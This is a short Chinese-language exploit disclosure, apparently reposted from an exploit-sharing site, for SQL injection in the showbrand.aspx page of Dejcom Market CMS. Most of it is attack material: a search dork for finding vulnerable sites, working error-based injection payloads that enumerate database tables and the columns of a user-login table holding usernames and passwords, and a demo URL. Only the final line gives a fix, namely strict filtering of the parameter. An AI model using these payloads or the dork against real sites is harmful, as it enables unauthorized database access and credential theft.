发布作者:Mormoroth
影响版本:ALL Version
漏洞类型:SQL注入
漏洞描述:Dejcom Market CMS showbrand.aspx页面参数未经过严格过滤,导致SQL注入漏洞产生。
Dork : "Powered By Dejcom Market CMS"
Exploit:
%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge,COMMENTS,filegroup,files,groups,khabarname,khat,links,login))--
showbrand.aspx?bc=%27 or 1=(select top 1 column_name from information_schema.columns where table_name=loguser and column_name not in(code,username,pass))--
Demo : http://www.2cto.com /showbrand.aspx?bc=%27 or 1=(select top 1 table_name from information_schema.tables where table_name not in(bill,billdetail,cart,charge))--
www.2cto.com修复方案:
showbrand.aspx页面参数严格过滤